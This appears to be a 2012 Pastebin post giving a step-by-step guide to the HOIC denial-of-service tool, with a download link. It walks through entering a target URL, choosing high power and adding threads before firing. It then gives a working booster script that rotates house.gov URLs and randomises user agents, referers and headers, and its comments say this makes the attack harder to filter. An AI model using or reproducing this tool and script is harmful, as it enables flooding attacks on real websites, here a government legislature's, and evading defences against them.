Sumo

Learn HOIC by Sumo

Apr 7th, 2012
299
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.64 KB | None | 0 0
  1. Hoic Download: http://www.mediafire.com/?zzeshi313vz3h7v
  2.  
  3.  
  4.  
  5. ok now that you have downloaded hoic you need to know how to use it.
  6.  
  7. when you open hoic youll see a few buttons such as threads with arrows up and down + - and fire.
  8.  
  9. to give hoic a target hit +
  10.  
  11. enter the full url of the target such as http://www.example.com/
  12.  
  13. next choose power, (I always use High)
  14.  
  15. then pick a booster
  16.  
  17. NOTE: you need a unique booster for each website. see http://pastebin.com/ye7xR8rJ for instructions on making a booster
  18.  
  19. say you were going to use a booster for www.example.com you would name it example.hoic and place it in the hoic folder so you can assign it to a target when you hit +
  20.  
  21. ok so now we have our target http://www.example.com/ with power on high and example.hoic booster
  22.  
  23. increase your threads to 4 or 5 and hit fire.
  24.  
  25. and then your done :D
  26.  
  27. NOTE: if your hoic keeps crashing try lowering the thread count
  28.  
  29. NOTE: below is an example of a booster
  30.  
  31.  
  32.  
  33. Dim useragents() as String
  34. Dim referers() as String
  35. dim randheaders() as string
  36. Dim randURLs() as string
  37.  
  38. // populate rotating urls
  39. // IF YOU WANT TO IMPROVE THE ATTACK, ADD URLS BELONGING TO THIS DOMAIN OR RELATED SUBDOMAINS!!! PRO-TIP: You should create anew target and .HOIC file if u want to attack a different organization
  40. randURLs.Append "http://www.house.gov/"
  41. randURLs.Append "http://www.house.gov/representatives/"
  42. randURLs.Append "http://www.house.gov/leadership/"
  43. randURLs.Append "http://www.house.gov/committees/"
  44. randURLs.Append "http://www.house.gov/legislative/"
  45. randURLs.Append "http://www.house.gov/content/learn/"
  46. randURLs.Append "http://www.house.gov/content/learn/branches_of_government/"
  47. randURLs.Append "http://www.house.gov/content/learn/legislative_process/"
  48. randURLs.Append "http://www.house.gov/content/learn/officers_and_organizations/"
  49. randURLs.Append "http://chaplain.house.gov/"
  50.  
  51. // rotate out url
  52. URL = randURLs(RndNumber(0, randURLs.UBound))
  53.  
  54. // EDIT THE FOLLOWING STRINGS TO MAKE YOUR OWN BOOST UNIQUE AND THEREFORE MORE EVASIVE!
  55.  
  56. // populate list
  57. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"
  58. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
  59. useragents.Append "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
  60. useragents.Append "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  61. useragents.Append "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.1; .NET CLR 1.1.4322)"
  62. useragents.Append "Googlebot/2.1 ( http://www.googlebot.com/bot.html) "
  63. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14"
  64. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.600.0 Safari/534.14"
  65. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13"
  66. useragents.Append "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Ubuntu/10.04 Chromium/9.0.595.0 Chrome/9.0.595.0 Safari/534.13"
  67. useragents.Append "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50727)"
  68. useragents.Append "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)"
  69. useragents.Append "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
  70. useragents.Append "Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0 Safari/533.16"
  71. useragents.Append "Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51"
  72. useragents.Append "Mozilla/5.0 (Windows NT 5.1; U; Firefox/5.0; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.53"
  73.  
  74. // populate referer list
  75. referers.Append "http://www.google.com/?q=Sumo+will+not+stop"
  76. referers.Append "http://www.google.com/?q=anonymous+hacker"
  77. referers.Append "http://www.google.com/?q=Open+wifi+to+all"
  78. referers.Append "http://www.google.com/?q=anonymous+cataclysm+leader"
  79. referers.Append URL
  80. randURLs.Append "http://www.house.gov/"
  81. randURLs.Append "http://www.house.gov/representatives/"
  82. randURLs.Append "http://www.house.gov/leadership/"
  83. randURLs.Append "http://www.house.gov/committees/"
  84. randURLs.Append "http://www.house.gov/legislative/"
  85. randURLs.Append "http://www.house.gov/content/learn/"
  86. randURLs.Append "http://www.house.gov/content/learn/branches_of_government/"
  87. randURLs.Append "http://www.house.gov/content/learn/legislative_process/"
  88. randURLs.Append "http://www.house.gov/content/learn/officers_and_organizations/"
  89. randURLs.Append "http://chaplain.house.gov/"
  90.  
  91. // Add random headers
  92. randheaders.Append "Cache-Control: no-cache"
  93. randheaders.Append "If-Modified-Since: Sat, 29 Oct 1994 11:59:59 GMT"
  94. randheaders.Append "If-Modified-Since: Tue, 18 Sep 2002 10:34:27 GMT"
  95. randheaders.Append "If-Modified-Since: Mon, 12 Aug 2004 12:54:49 GMT"
  96. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  97. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2006 08:49:15 GMT"
  98. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2006 09:34:27 GMT"
  99. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2001 05:17:09 GMT"
  100. randheaders.Append "If-Modified-Since: Tue, 18 Apr 2003 12:54:49 GMT"
  101. randheaders.Append "If-Modified-Since: Sat, 18 Aug 2002 12:54:49 GMT"
  102. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2000 01:21:09 GMT"
  103. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  104. randheaders.Append "If-Modified-Since: Fri, 20 Jun 2006 09:34:27 GMT"
  105. randheaders.Append "If-Modified-Since: Sun, 13 Oct 2007 11:59:59 GMT"
  106. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2003 12:54:49 GMT"
  107. randheaders.Append "If-Modified-Since: Wed, 30 Jan 2002 01:21:09 GMT"
  108. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2009 08:49:15 GMT"
  109. randheaders.Append "If-Modified-Since: Fri, 20 Oct 2008 09:34:27 GMT"
  110. randheaders.Append "If-Modified-Since: Mon, 29 Oct 2007 11:59:59 GMT"
  111. randheaders.Append "If-Modified-Since: Tue, 18 Aug 2001 12:54:49 GMT"
  112.  
  113. Headers.Append "Keep-Alive: 115"
  114. Headers.Append "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7"
  115. Headers.Append "Connection: keep-alive"
  116.  
  117. // ------------------ DO NOT EDIT BELOW THIS LINE
  118.  
  119. // generate random referer
  120. Headers.Append "Referer: " + referers(RndNumber(0, referers.UBound))
  121. // generate random user agent (DO NOT MODIFY THIS LINE)
  122. Headers.Append "User-Agent: " + useragents(RndNumber(0, useragents.UBound))
  123. // Generate random headers
  124. Headers.Append randheaders(RndNumber(0, randheaders.UBound))
Add Comment
Please, Sign In to add comment